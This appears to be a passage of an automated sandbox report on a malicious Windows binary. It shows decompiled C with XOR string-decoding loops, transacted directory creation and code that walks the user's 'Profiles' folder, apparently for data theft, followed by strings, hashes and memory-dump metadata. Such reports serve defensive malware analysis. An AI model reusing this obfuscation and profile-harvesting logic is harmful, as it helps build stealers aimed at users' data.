				 *((intOrPtr*)(_t526 - 0x10)) = _t528 - 0x180;
				asm("movups [ebp-0xab], xmm0");
				 *((intOrPtr*)(_t526 - 0x9b)) = 0x41414c5a;
				 *((short*)(_t526 - 0x97)) = 0x5948;
				 *((char*)(_t526 - 0x95)) = 0;
				do {
					 *(_t526 + _t381 - 0xaa) =  *(_t526 + _t381 - 0xaa) ^  *(_t526 - 0xab);
					_t381 = _t381 + 1;
				} while (_t381 < 0x15);
				 *((char*)(_t526 - 0x95)) = 0;
				_t272 =  >=  ?  *0x248090 : 0x248090;
				_t274 = L001F57CC(E00206A2E(0, _t503, _t515,  *0x2480a4 - 0x10,  >=  ?  *0x248090 : 0x248090), _t526 - 0xaa);
				 *((intOrPtr*)(_t526 - 0xe0)) = 0;
				 *((intOrPtr*)(_t526 - 0xd0)) = 0;
				 *((intOrPtr*)(_t526 - 0xcc)) = 0xf;
				 *((char*)(_t526 - 0xe0)) = 0;
				L001D2F8E(_t274);
				 *((char*)(_t526 - 0x30)) = 0;
				_push( *((intOrPtr*)(_t526 - 0x30)));
				 *((char*)(_t526 - 4)) = 1;
				E001D4B70(_t526 - 0xe0);
				 *((char*)(_t526 - 4)) = 2;
				 *((char*)(_t526 - 0x15)) = E001CB2CE(_t526 - 0x50);
				 *((char*)(_t526 - 4)) = 1;
				E001D2D4F(_t526 - 0x50);
				_t534 =  *((char*)(_t526 - 0x15));
				if( *((char*)(_t526 - 0x15)) == 0) {
					L53:
					_t279 = E001D2F2D(_t526 - 0xe0);
					 *[fs:0x0] =  *((intOrPtr*)(_t526 - 0xc));
					return _t279;
				} else {
					 *((char*)(_t526 - 0x30)) = 0;
					_push( *((intOrPtr*)(_t526 - 0x30)));
					E001D4B70(_t526 - 0xe0);
					 *((char*)(_t526 - 4)) = 3;
					E001CAF03(0, _t526 - 0x5c, _t503, _t534, _t526 - 0x50);
					E001D2D4F(_t526 - 0x50);
					E001CBF31(_t526 - 0xb4, _t526 - 0x5c);
					_t505 =  *((intOrPtr*)(_t526 - 0xb4));
					_t517 =  *(_t526 - 0xb0);
					 *((intOrPtr*)(_t526 - 0x38)) = _t505;
					 *(_t526 - 0x34) = _t517;
					E001CBF31(_t526 - 0xb4, _t526 - 0x5c);
					_t397 =  *(_t526 - 0xb0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0xbc], xmm0");
					_t288 = 0;
					 *((intOrPtr*)(_t526 - 0xbc)) = 0;
					 *((intOrPtr*)(_t526 - 0xb8)) = 0;
					if( *(_t526 - 0xb0) != 0) {
						E001C9597(_t397);
						_t288 = 0;
					}
					while(_t505 != _t288) {
						_t524 = _t505 + 0x20;
						 *((char*)(_t526 - 4)) = 8;
						 *((intOrPtr*)(_t526 - 0x30)) = _t524;
						if(E001D54E9(_t524) == 0) {
							L17:
							 *((intOrPtr*)(_t526 - 4)) = 7;
							E001CAF48(0, _t526 - 0x38, __eflags);
							_t517 =  *(_t526 - 0x34);
							_t505 =  *((intOrPtr*)(_t526 - 0x38));
							_t288 =  *((intOrPtr*)(_t526 - 0xbc));
							continue;
						}
						_t495 = 0x12;
						 *(_t526 - 0x2c) = 0x7e734512;
						 *(_t526 - 0x28) = 0x6166777e;
						_t450 = 0;
						 *((char*)(_t526 - 0x24)) = 0;
						while(1) {
							 *(_t526 + _t450 - 0x2b) =  *(_t526 + _t450 - 0x2b) ^ _t495;
							_t450 = _t450 + 1;
							if(_t450 >= 7) {
								break;
							}
							_t495 =  *(_t526 - 0x2c);
						}
						 *((char*)(_t526 - 0x24)) = 0;
						_t346 = L001F57CC(E001F5C6D(), _t526 - 0x2b);
						_t511 = 0xf;
						 *((intOrPtr*)(_t526 - 0x94)) = 0;
						 *((intOrPtr*)(_t526 - 0x84)) = 0;
						 *((intOrPtr*)(_t526 - 0x80)) = _t511;
						L001D2F8E(_t346);
						E001CB7F6(_t526 - 0x94);
						E001D2F2D(_t526 - 0x94);
						asm("movaps xmm0, [0x23d7a0]");
						_t455 = 0;
						asm("movups [ebp-0x8c], xmm0");
						do {
							 *(_t526 + _t455 - 0x8b) =  *(_t526 + _t455 - 0x8b) ^  *(_t526 - 0x8c);
							_t455 = _t455 + 1;
							__eflags = _t455 - 0xe;
						} while (_t455 < 0xe);
						 *((char*)(_t526 - 0x7d)) = 0;
						_t353 = L001F57CC(E001F5C6D(), _t526 - 0x8b);
						 *((intOrPtr*)(_t526 - 0x50)) = 0;
						 *((intOrPtr*)(_t526 - 0x40)) = 0;
						 *((intOrPtr*)(_t526 - 0x3c)) = _t511;
						L001D2F8E(_t353);
						E001CB7F6(_t526 - 0x50);
						E001D2F2D(_t526 - 0x50);
						asm("movaps xmm0, [0x23d920]");
						_t498 = 0;
						asm("movups [ebp-0x7b], xmm0");
						 *((intOrPtr*)(_t526 - 0x6b)) = 0x373c2b36;
						 *((intOrPtr*)(_t526 - 0x67)) = 0x247d2026;
						 *((intOrPtr*)(_t526 - 0x63)) = 0x363f3f32;
						 *((short*)(_t526 - 0x5f)) = 0x27;
						do {
							 *(_t526 + _t498 - 0x7a) =  *(_t526 + _t498 - 0x7a) ^  *(_t526 - 0x7b);
							_t498 = _t498 + 1;
							__eflags = _t498 - 0x1c;
						} while (_t498 < 0x1c);
						 *((char*)(_t526 - 0x5e)) = 0;
						_t358 = L001F57CC(E001F5C6D(), _t526 - 0x7a);
						 *((intOrPtr*)(_t526 - 0x50)) = 0;
						 *((intOrPtr*)(_t526 - 0x40)) = 0;
						 *((intOrPtr*)(_t526 - 0x3c)) = _t511;
						L001D2F8E(_t358);
						E001CB7F6(_t526 - 0x50);
						E001D2F2D(_t526 - 0x50);
						_t465 = _t524;
						_t363 = E001CA1C2(_t465, _t526 - 0xf8);
						_push(_t465);
						 *((char*)(_t526 - 4)) = 9;
						E001D3654(_t363, _t526 - 0x94);
						_t513 =  *(_t526 - 0x1c) | 0x00000040;
						__eflags = _t513;
						 *(_t526 - 0x1c) = _t513;
						 *((char*)(_t526 - 4)) = 0xa;
						_t468 = 0;
						asm("movaps xmm0, [0x23d8b0]");
						asm("movups [ebp-0x7c], xmm0");
						 *((intOrPtr*)(_t526 - 0x6c)) = 0x3e35223f;
						 *((intOrPtr*)(_t526 - 0x68)) = 0x2d74292f;
						 *((intOrPtr*)(_t526 - 0x64)) = 0x3f36363b;
						 *((short*)(_t526 - 0x60)) = 0x62e;
						 *((char*)(_t526 - 0x5e)) = 0;
						do {
							 *(_t526 + _t468 - 0x7b) =  *(_t526 + _t468 - 0x7b) ^  *(_t526 - 0x7c);
							_t468 = _t468 + 1;
							__eflags = _t468 - 0x1d;
						} while (_t468 < 0x1d);
						 *((char*)(_t526 - 0x5e)) = 0;
						_t369 = E001DC2AE(_t526 - 0x110, L001F57CC(E001F5C6D(), _t526 - 0x7b), _t526 - 0x94);
						_pop(_t472);
						 *((char*)(_t526 - 4)) = 0xb;
						E001D3654( *((intOrPtr*)(_t526 - 0x30)), _t526 - 0x50);
						 *(_t526 - 0x1c) = _t513 | 0x00000200;
						E001D5505(_t526 - 0x50, _t369);
						E001D2F2D(_t526 - 0x50);
						E001D2F2D(_t526 - 0x110);
						E001D2F2D(_t526 - 0x94);
						E001D2D4F(_t526 - 0xf8);
						goto L17;
					}
					__eflags = _t517;
					if(_t517 != 0) {
						E001C9597(_t517);
					}
					 *((char*)(_t526 - 4)) = 1;
					_t398 =  *(_t526 - 0x58);
					__eflags =  *(_t526 - 0x58);
					if( *(_t526 - 0x58) != 0) {
						E001C9597(_t398);
					}
					_t482 = 0x59;
					 *(_t526 - 0x2c) = _t482;
					_t399 = 0;
					 *((intOrPtr*)(_t526 - 0x2b)) = 0x36211c05;
					 *((intOrPtr*)(_t526 - 0x27)) = 0x2a2c3d;
					while(1) {
						 *(_t526 + _t399 - 0x2b) =  *(_t526 + _t399 - 0x2b) ^ _t482;
						_t399 = _t399 + 1;
						__eflags = _t399 - 7;
						if(_t399 >= 7) {
							break;
						}
						_t482 =  *(_t526 - 0x2c);
					}
					__eflags =  *0x2480a4 - 0x10;
					 *((char*)(_t526 - 0x24)) = 0;
					_t290 =  >=  ?  *0x248090 : 0x248090;
					L001D2F8E(L001F57CC(E00206A2E(0, _t505, _t517,  *0x2480a4 - 0x10,  >=  ?  *0x248090 : 0x248090), _t526 - 0x2b));
					 *((char*)(_t526 - 0x30)) = 0;
					_push( *((intOrPtr*)(_t526 - 0x30)));
					E001D4B70(_t526 - 0xe0);
					 *((char*)(_t526 - 4)) = 0xd;
					E001CAF03(0, _t526 - 0xb4, _t505, __eflags, _t526 - 0x50);
					E001D2D4F(_t526 - 0x50);
					E001CBF31(_t526 - 0x5c, _t526 - 0xb4);
					_t506 =  *((intOrPtr*)(_t526 - 0x5c));
					_t518 =  *(_t526 - 0x58);
					 *((intOrPtr*)(_t526 - 0xc4)) = _t506;
					 *(_t526 - 0xc0) = _t518;
					E001CBF31(_t526 - 0x2c, _t526 - 0xb4);
					_t409 =  *(_t526 - 0x28);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x5c], xmm0");
					_t302 = 0;
					 *((intOrPtr*)(_t526 - 0x5c)) = 0;
					 *(_t526 - 0x58) = 0;
					__eflags =  *(_t526 - 0x28);
					if( *(_t526 - 0x28) != 0) {
						E001C9597(_t409);
						_t302 = 0;
					}
					 *((char*)(_t526 - 4)) = 0x11;
					while(1) {
						__eflags = _t506 - _t302;
						if(_t506 == _t302) {
							break;
						}
						_t507 = _t506 + 0x20;
						 *((char*)(_t526 - 4)) = 0x12;
						 *((intOrPtr*)(_t526 - 0xb8)) = _t507;
						_t305 = E001D54E9(_t507);
						__eflags = _t305;
						if(_t305 == 0) {
							L34:
							 *((char*)(_t526 - 0x15)) = 0;
							L35:
							_t306 =  *(_t526 - 0x1c);
							__eflags = _t306 & 0x00000002;
							if((_t306 & 0x00000002) != 0) {
								_t333 = _t306 & 0xfffffffd;
								__eflags = _t333;
								 *(_t526 - 0x1c) = _t333;
								E001D2D4F(_t526 - 0xf8);
								_t306 =  *(_t526 - 0x1c);
							}
							 *((intOrPtr*)(_t526 - 4)) = 0x12;
							__eflags = _t306 & 0x00000001;
							if((_t306 & 0x00000001) != 0) {
								_t331 = _t306 & 0xfffffffe;
								__eflags = _t331;
								 *(_t526 - 0x1c) = _t331;
								E001D2D4F(_t526 - 0x50);
							}
							__eflags =  *((char*)(_t526 - 0x15));
							if(__eflags == 0) {
								L48:
								 *((intOrPtr*)(_t526 - 4)) = 0x11;
								E001CAF48(0, _t526 - 0xc4, __eflags);
								_t518 =  *(_t526 - 0xc0);
								_t506 =  *((intOrPtr*)(_t526 - 0xc4));
								_t302 =  *((intOrPtr*)(_t526 - 0x5c));
								continue;
							} else {
								_t487 = 0x47;
								 *((intOrPtr*)(_t526 - 0x85)) = 0x2b261047;
								 *((intOrPtr*)(_t526 - 0x81)) = 0x3433222b;
								_t414 = 0;
								 *((char*)(_t526 - 0x7d)) = 0;
								while(1) {
									 *(_t526 + _t414 - 0x84) =  *(_t526 + _t414 - 0x84) ^ _t487;
									_t414 = _t414 + 1;
									__eflags = _t414 - 7;
									if(_t414 >= 7) {
										break;
									}
									_t487 =  *((intOrPtr*)(_t526 - 0x85));
								}
								 *((char*)(_t526 - 0x7d)) = 0;
								_t309 = L001F57CC(E001F5C6D(), _t526 - 0x84);
								_t519 = 0xf;
								 *((intOrPtr*)(_t526 - 0x50)) = 0;
								 *((intOrPtr*)(_t526 - 0x40)) = 0;
								 *((intOrPtr*)(_t526 - 0x3c)) = _t519;
								L001D2F8E(_t309);
								E001CB7F6(_t526 - 0x50);
								E001D2F2D(_t526 - 0x50);
								asm("movaps xmm0, [0x23d790]");
								_t489 = 0;
								asm("movups [ebp-0xa4], xmm0");
								do {
									 *(_t526 + _t489 - 0xa3) =  *(_t526 + _t489 - 0xa3) ^  *(_t526 - 0xa4);
									_t489 = _t489 + 1;
									__eflags = _t489 - 0xe;
								} while (_t489 < 0xe);
								 *((char*)(_t526 - 0x95)) = 0;
								_t314 = L001F57CC(E001F5C6D(), _t526 - 0xa3);
								 *((intOrPtr*)(_t526 - 0x50)) = 0;
								 *((intOrPtr*)(_t526 - 0x40)) = 0;
								 *((intOrPtr*)(_t526 - 0x3c)) = _t519;
								L001D2F8E(_t314);
								E001CB7F6(_t526 - 0x50);
								E001D2F2D(_t526 - 0x50);
								_t424 = _t507;
								_t319 = E001CA1C2(_t424, _t526 - 0x78);
								_push(_t424);
								 *((char*)(_t526 - 4)) = 0x14;
								E001D3654(_t319, _t526 - 0x110);
								_t509 =  *(_t526 - 0x1c) | 0x00010000;
								__eflags = _t509;
								 *(_t526 - 0x1c) = _t509;
								 *((char*)(_t526 - 4)) = 0x15;
								_t491 = 0;
								asm("movaps xmm0, [0x23d9f0]");
								asm("movups [ebp-0xa5], xmm0");
								 *((char*)(_t526 - 0x95)) = 0;
								do {
									 *(_t526 + _t491 - 0xa4) =  *(_t526 + _t491 - 0xa4) ^  *(_t526 - 0xa5);
									_t491 = _t491 + 1;
									__eflags = _t491 - _t519;
								} while (_t491 < _t519);
								 *((char*)(_t526 - 0x95)) = 0;
								_t323 = E001DC2AE(_t526 - 0xf8, L001F57CC(E001F5C6D(), _t526 - 0xa4), _t526 - 0x110);
								_pop(_t431);
								 *((char*)(_t526 - 4)) = 0x16;
								E001D3654( *((intOrPtr*)(_t526 - 0xb8)), _t526 - 0x50);
								 *(_t526 - 0x1c) = _t509 | 0x00080000;
								E001D5505(_t526 - 0x50, _t323);
								E001D2F2D(_t526 - 0x50);
								E001D2F2D(_t526 - 0xf8);
								E001D2F2D(_t526 - 0x110);
								E001D2D4F(_t526 - 0x78);
								goto L48;
							}
						}
						_t485 = 0x4a;
						 *((intOrPtr*)(_t526 - 0x37)) = 0x3920644a;
						 *((short*)(_t526 - 0x33)) = 0x2425;
						_t440 = 0;
						 *((char*)(_t526 - 0x31)) = 0;
						while(1) {
							 *(_t526 + _t440 - 0x36) =  *(_t526 + _t440 - 0x36) ^ _t485;
							_t440 = _t440 + 1;
							__eflags = _t440 - 5;
							if(_t440 >= 5) {
								break;
							}
							_t174 = _t526 - 0x37; // 0x3920644a
							_t485 =  *_t174;
						}
						 *((char*)(_t526 - 0x30)) = 0;
						_push( *((intOrPtr*)(_t526 - 0x30)));
						 *((char*)(_t526 - 0x31)) = 0;
						 *((intOrPtr*)(_t526 - 0xc8)) = _t526 - 0x36;
						E001D4BA2(_t526 - 0xc8);
						 *((char*)(_t526 - 4)) = 0x13;
						_t522 =  *(_t526 - 0x1c) | 0x00000001;
						 *(_t526 - 0x1c) = _t522;
						_t338 = E001D541C(_t507, _t526 - 0xf8);
						__eflags =  *((intOrPtr*)(_t526 - 0x3c)) - 8;
						 *(_t526 - 0x1c) = _t522 | 0x00000002;
						_t445 =  >=  ?  *((void*)(_t526 - 0x50)) : _t526 - 0x50;
						_t339 = E001CA009(_t338,  >=  ?  *((void*)(_t526 - 0x50)) : _t526 - 0x50,  *((intOrPtr*)(_t526 - 0x40)));
						 *((char*)(_t526 - 0x15)) = 1;
						__eflags = _t339;
						if(_t339 == 0) {
							goto L35;
						}
						goto L34;
					}
					__eflags = _t518;
					if(_t518 != 0) {
						E001C9597(_t518);
					}
					_t410 =  *(_t526 - 0xb0);
					__eflags =  *(_t526 - 0xb0);
					if( *(_t526 - 0xb0) != 0) {
						E001C9597(_t410);
					}
					goto L53;
				}
			}

0x001d8f10
0x001d8f1e
0x001d8f21
0x001d8f23
0x001d8f26
0x001d8f2d
0x001d8f2e
0x001d8f2f
0x001d8f32
0x001d8f39
0x001d8f43
0x001d8f4c
0x001d8f52
0x001d8f5f
0x001d8f66
0x001d8f67
0x001d8f78
0x001d8f7e
0x001d8f94
0x001d8f99
0x001d8fa6
0x001d8fac
0x001d8fb6
0x001d8fbc
0x001d8fc1
0x001d8fca
0x001d8fd0
0x001d8fd4
0x001d8fdd
0x001d8fe9
0x001d8fec
0x001d8ff0
0x001d8ff5
0x001d8ff9
0x001d96d3
0x001d96d9
0x001d96e3
0x001d96ec
0x001d8fff
0x001d8fff
0x001d9008
0x001d900e
0x001d9017
0x001d901f
0x001d9027
0x001d9036
0x001d903b
0x001d9041
0x001d9047
0x001d904a
0x001d9057
0x001d905c
0x001d9062
0x001d9065
0x001d906d
0x001d906f
0x001d9075
0x001d907d
0x001d907f
0x001d9084
0x001d9084
0x001d9086
0x001d908e
0x001d9091
0x001d9097
0x001d90a1
0x001d92dc
0x001d92df
0x001d92e6
0x001d92eb
0x001d92ee
0x001d92f1
0x00000000
0x001d92f1
0x001d90a7
0x001d90a9
0x001d90b0
0x001d90b7
0x001d90b9
0x001d90bc
0x001d90bc
0x001d90c0
0x001d90c4
0x00000000
0x00000000
0x001d90c6
0x001d90c6
0x001d90cb
0x001d90d8
0x001d90df
0x001d90e7
0x001d90ed
0x001d90f3
0x001d90f6
0x001d9101
0x001d910c
0x001d9111
0x001d9118
0x001d911a
0x001d9121
0x001d912e
0x001d9135
0x001d9136
0x001d9136
0x001d913b
0x001d914b
0x001d9154
0x001d9157
0x001d915a
0x001d915d
0x001d9165
0x001d916d
0x001d9172
0x001d9179
0x001d917b
0x001d917f
0x001d9186
0x001d918d
0x001d9194
0x001d919a
0x001d919d
0x001d91a1
0x001d91a2
0x001d91a2
0x001d91a7
0x001d91b4
0x001d91bd
0x001d91c0
0x001d91c3
0x001d91c6
0x001d91ce
0x001d91d6
0x001d91e1
0x001d91e4
0x001d91e9
0x001d91f0
0x001d91f7
0x001d91ff
0x001d91ff
0x001d9202
0x001d9205
0x001d9209
0x001d920b
0x001d9212
0x001d9216
0x001d921d
0x001d9224
0x001d922b
0x001d9231
0x001d9234
0x001d923b
0x001d923f
0x001d9240
0x001d9240
0x001d9245
0x001d9266
0x001d926b
0x001d9276
0x001d927a
0x001d928a
0x001d928d
0x001d9295
0x001d92a0
0x001d92ab
0x001d92b6
0x00000000
0x001d92b6
0x001d92fc
0x001d92fe
0x001d9302
0x001d9302
0x001d9307
0x001d930b
0x001d930e
0x001d9310
0x001d9312
0x001d9312
0x001d9319
0x001d931a
0x001d931d
0x001d931f
0x001d9326
0x001d932d
0x001d932d
0x001d9331
0x001d9332
0x001d9335
0x00000000
0x00000000
0x001d9337
0x001d9337
0x001d933c
0x001d9348
0x001d934b
0x001d936a
0x001d936f
0x001d9378
0x001d937e
0x001d9387
0x001d9392
0x001d939a
0x001d93a9
0x001d93ae
0x001d93b1
0x001d93b4
0x001d93ba
0x001d93ca
0x001d93cf
0x001d93d2
0x001d93d5
0x001d93da
0x001d93dc
0x001d93df
0x001d93e2
0x001d93e4
0x001d93e6
0x001d93eb
0x001d93eb
0x001d93ed
0x001d93f1
0x001d93f1
0x001d93f3
0x00000000
0x00000000
0x001d93f9
0x001d93fc
0x001d9402
0x001d9408
0x001d940d
0x001d940f
0x001d9498
0x001d9498
0x001d949b
0x001d949b
0x001d949e
0x001d94a0
0x001d94a2
0x001d94a2
0x001d94ab
0x001d94ae
0x001d94b3
0x001d94b3
0x001d94b6
0x001d94bd
0x001d94bf
0x001d94c1
0x001d94c1
0x001d94c7
0x001d94ca
0x001d94ca
0x001d94cf
0x001d94d3
0x001d9693
0x001d9699
0x001d96a0
0x001d96a5
0x001d96ab
0x001d96b1
0x00000000
0x001d94d9
0x001d94d9
0x001d94db
0x001d94e5
0x001d94ef
0x001d94f1
0x001d94f4
0x001d94f4
0x001d94fb
0x001d94fc
0x001d94ff
0x00000000
0x00000000
0x001d9501
0x001d9501
0x001d9509
0x001d9519
0x001d9520
0x001d9525
0x001d9528
0x001d952b
0x001d952e
0x001d9536
0x001d953e
0x001d9543
0x001d954a
0x001d954c
0x001d9553
0x001d9559
0x001d9560
0x001d9561
0x001d9561
0x001d9566
0x001d9579
0x001d9582
0x001d9585
0x001d9588
0x001d958b
0x001d9593
0x001d959b
0x001d95a3
0x001d95a6
0x001d95ab
0x001d95b2
0x001d95b9
0x001d95c1
0x001d95c1
0x001d95c7
0x001d95ca
0x001d95ce
0x001d95d0
0x001d95d7
0x001d95de
0x001d95e4
0x001d95ea
0x001d95f1
0x001d95f2
0x001d95f2
0x001d95f6
0x001d961d
0x001d9622
0x001d9629
0x001d9634
0x001d9644
0x001d9647
0x001d964f
0x001d965a
0x001d9665
0x001d966d
0x00000000
0x001d966d
0x001d94d3
0x001d9415
0x001d9417
0x001d941e
0x001d9424
0x001d9426
0x001d9429
0x001d9429
0x001d942d
0x001d942e
0x001d9431
0x00000000
0x00000000
0x001d9433
0x001d9433
0x001d9433
0x001d9438
0x001d943e
0x001d9447
0x001d944d
0x001d9453
0x001d9459
0x001d9468
0x001d946c
0x001d946f
0x001d947d
0x001d9481
0x001d9484
0x001d948b
0x001d9490
0x001d9494
0x001d9496
0x00000000
0x00000000
0x00000000
0x001d9496
0x001d96b9
0x001d96bb
0x001d96bf
0x001d96bf
0x001d96c4
0x001d96ca
0x001d96cc
0x001d96ce
0x001d96ce
0x00000000
0x001d96cc

APIs

__EH_prolog.LIBCMT ref: 001D8F10

Part of subcall function 001CB7F6: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,001DA5C7,00000000), ref: 001CB80A
Part of subcall function 001CB7F6: CreateDirectoryTransactedA.KERNEL32 ref: 001CB823
Part of subcall function 001CB7F6: CommitTransaction.KTMW32(00000000,?,001DA5C7,00000000), ref: 001CB82E

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Strings

ZLAA, xrefs: 001D8F39
;66?, xrefs: 001D9224
+"34, xrefs: 001D94E5
HY, xrefs: 001D8F43
~wfa, xrefs: 001D90B0
Jd 9%$, xrefs: 001D9433
/)t-, xrefs: 001D921D
?"5>, xrefs: 001D9216
', xrefs: 001D9194
2??6, xrefs: 001D918D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateDeallocateTransaction$CommitDirectoryH_prologTransacted
String ID: '$+"34$/)t-$2??6$;66?$?"5>$HY$Jd 9%$$ZLAA$~wfa
API String ID: 1196510075-3473976011
Opcode ID: 3c833ed49b14be8c11b211a75616c462ab05a90aed431853abfbd59c74cccc8d
Instruction ID: db75c7d737cfb4b576ba53663efc1a3f3a158ba6a725a77a3dc09b67189c8e82
Opcode Fuzzy Hash: 3c833ed49b14be8c11b211a75616c462ab05a90aed431853abfbd59c74cccc8d
Instruction Fuzzy Hash: 8E326870D042988ACF19EFA4D891BEDFBB1BF69300F4441AEE4597B242DB705A89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001E2D2B, Relevance: 18.1, APIs: 4, Strings: 6, Instructions: 593
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E001E2D2B(void* __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t300;
				void* _t307;
				void* _t311;
				void* _t312;
				void* _t331;
				void* _t340;
				void* _t344;
				void* _t346;
				intOrPtr _t354;
				void* _t356;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t364;
				intOrPtr _t366;
				intOrPtr _t368;
				intOrPtr _t369;
				void* _t372;
				void* _t376;
				void* _t380;
				intOrPtr _t384;
				void* _t385;
				void* _t389;
				void* _t393;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t405;
				void* _t406;
				intOrPtr _t408;
				void* _t410;
				intOrPtr _t421;
				void* _t427;
				char _t454;
				void* _t456;
				char _t466;
				void* _t469;
				char _t475;
				intOrPtr _t481;
				intOrPtr _t495;
				char _t498;
				char _t505;
				char _t524;
				char _t525;
				void* _t527;
				signed char _t539;
				signed char _t547;
				signed char _t554;
				void* _t555;
				signed char _t565;
				signed int _t566;
				void* _t569;
				signed int _t570;
				intOrPtr _t573;
				signed int _t575;
				void* _t578;
				signed int _t579;
				void* _t580;
				intOrPtr _t582;
				char _t588;
				signed int _t589;
				void* _t590;
				void* _t591;
				signed int _t592;
				void* _t595;
				void* _t597;
				intOrPtr _t598;
				void* _t599;
				void* _t601;

				_t601 = __eflags;
				L00227790(0x229730, _t595);
				_t598 = _t597 - 0x434;
				 *((intOrPtr*)(_t595 - 0x10)) = _t598;
				 *((intOrPtr*)(_t595 - 0xb4)) = __edx;
				_t570 = 0;
				_t581 = __ecx;
				 *(_t595 - 0x64) = 0;
				 *0x22d2d4(0, 0x1a, 0, 0, _t595 - 0x33c, _t569, _t580, _t410);
				E001DC8EE(_t595 - 0x440, 0x104, L001F57CC(L001F57CC("%s", __ecx), "Profiles"), _t595 - 0x33c);
				 *((char*)(_t595 - 0x68)) = 0;
				_push( *((intOrPtr*)(_t595 - 0x68)));
				E001D4BDC(_t595 - 0x440);
				_t599 = _t598 + 0x14;
				 *((intOrPtr*)(_t595 - 4)) = 0;
				_push(_t595 - 0x88);
				E001CAC66(0, _t595 - 0xcc, 0, _t581, _t601);
				E001D2D4F(_t595 - 0x88);
				E001CBF31(_t595 - 0x20, _t595 - 0xcc);
				_t421 =  *((intOrPtr*)(_t595 - 0x20));
				_t582 =  *((intOrPtr*)(_t595 - 0x1c));
				 *((intOrPtr*)(_t595 - 0x68)) = _t421;
				 *((intOrPtr*)(_t595 - 0xa0)) = _t421;
				 *((intOrPtr*)(_t595 - 0x9c)) = _t582;
				E001CBF31(_t595 - 0x120, _t595 - 0xcc);
				_t423 =  *((intOrPtr*)(_t595 - 0x11c));
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0xa8], xmm0");
				_t524 = 0;
				 *((intOrPtr*)(_t595 - 0xa8)) = 0;
				 *((intOrPtr*)(_t595 - 0xa4)) = 0;
				if( *((intOrPtr*)(_t595 - 0x11c)) != 0) {
					E001C9597(_t423);
					_t524 = 0;
				}
				 *((char*)(_t595 - 4)) = 4;
				_t300 =  *((intOrPtr*)(_t595 - 0x20));
				 *(_t595 - 0x98) = 0x18;
				while(_t300 != _t524) {
					_t584 = _t300 + 0x20;
					 *((char*)(_t595 - 4)) = 5;
					_t427 = _t300 + 0x20;
					if(E001CB2CE(_t427) != 0) {
						asm("movaps xmm0, [0x23dc90]");
						_t525 = 0;
						asm("movups [ebp-0x59], xmm0");
						 *((char*)(_t595 - 0x49)) = 0;
						do {
							 *(_t595 + _t525 - 0x58) =  *(_t595 + _t525 - 0x58) ^  *(_t595 - 0x59);
							_t525 = _t525 + 1;
						} while (_t525 < 0xf);
						_push(_t427);
						 *((char*)(_t595 - 0x49)) = 0;
						E001D3654(_t584, _t595 - 0x88);
						 *(_t595 - 0x64) = _t570 | 0x00000004;
						 *((char*)(_t595 - 4)) = 6;
						_t431 =  >=  ?  *((void*)(_t595 - 0x88)) : _t595 - 0x88;
						_t307 = L001F57CC( >=  ?  *((void*)(_t595 - 0x88)) : _t595 - 0x88, _t595 - 0x58);
						_t573 = 0xf;
						 *((intOrPtr*)(_t595 - 0x118)) = 0;
						 *((intOrPtr*)(_t595 - 0x108)) = 0;
						 *((intOrPtr*)(_t595 - 0x104)) = _t573;
						 *((char*)(_t595 - 0x118)) = 0;
						L001D2F8E(_t307);
						 *((char*)(_t595 - 4)) = 8;
						E001D2F2D(_t595 - 0x88);
						_t527 = 9;
						E001F5BFA(_t595 - 0x100, _t527, _t573,  *((intOrPtr*)(_t595 - 0x74)) - 0x10);
						 *((char*)(_t595 - 4)) = 9;
						_t584 =  >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100;
						_t311 = E001F5C6D();
						_t528 =  >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100;
						_t312 = L001F57CC(_t311,  >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100);
						 *((intOrPtr*)(_t595 - 0xe8)) = 0;
						 *((intOrPtr*)(_t595 - 0xd8)) = 0;
						 *((intOrPtr*)(_t595 - 0xd4)) = _t573;
						 *((char*)(_t595 - 0xe8)) = 0;
						L001D2F8E(_t312);
						 *((char*)(_t595 - 0xac)) = 0;
						_push( *((intOrPtr*)(_t595 - 0xac)));
						 *((char*)(_t595 - 4)) = 0xa;
						E001D4B70(_t595 - 0x118);
						 *((char*)(_t595 - 4)) = 0xb;
						 *((char*)(_t595 - 0x15)) = E001CB272(0, _t595 - 0x88, _t573,  >=  ?  *((void*)(_t595 - 0x100)) : _t595 - 0x100);
						 *((char*)(_t595 - 4)) = 0xa;
						E001D2D4F(_t595 - 0x88);
						if( *((char*)(_t595 - 0x15)) != 0) {
							 *((char*)(_t595 - 0xb0)) = 0;
							_push( *((intOrPtr*)(_t595 - 0xb0)));
							E001D4B70(_t595 - 0xe8);
							 *((char*)(_t595 - 0xc0)) = 0;
							 *((char*)(_t595 - 4)) = 0xc;
							E001D4B70(_t595 - 0x118);
							 *((char*)(_t595 - 4)) = 0xd;
							E001CB1D6(0, _t595 - 0x88, _t595 - 0x60,  *((intOrPtr*)(_t595 - 0xc0)));
							E001D2D4F(_t595 - 0x88);
							 *((char*)(_t595 - 4)) = 0xa;
							E001D2D4F(_t595 - 0x60);
